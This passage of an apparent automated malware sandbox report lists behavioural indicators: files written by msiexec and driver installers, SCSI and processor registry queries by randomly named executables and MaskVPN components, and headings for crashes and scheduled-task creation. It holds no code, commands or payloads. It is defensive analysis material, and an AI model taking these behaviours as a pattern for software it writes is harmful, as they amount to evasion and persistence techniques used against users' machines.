| File created | C:\Windows\SystemTemp\~DF5ED3D4B595CB9760.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f769249.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA8EE.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF06CBBDA2F860CFFF.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF4E11D7E6A71AB828.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFEB4422B23B80AE14.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIEA2E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF200.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI1B66.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2059.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI471.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3886.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Installer\f769249.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIECA0.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFBB5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI14FC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI1E26.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI6791.tmp | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\OxoehhQCj1yPmBfFQnSfhg0U.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Service | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\LowerFilters | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\OxoehhQCj1yPmBfFQnSfhg0U.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Capabilities | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
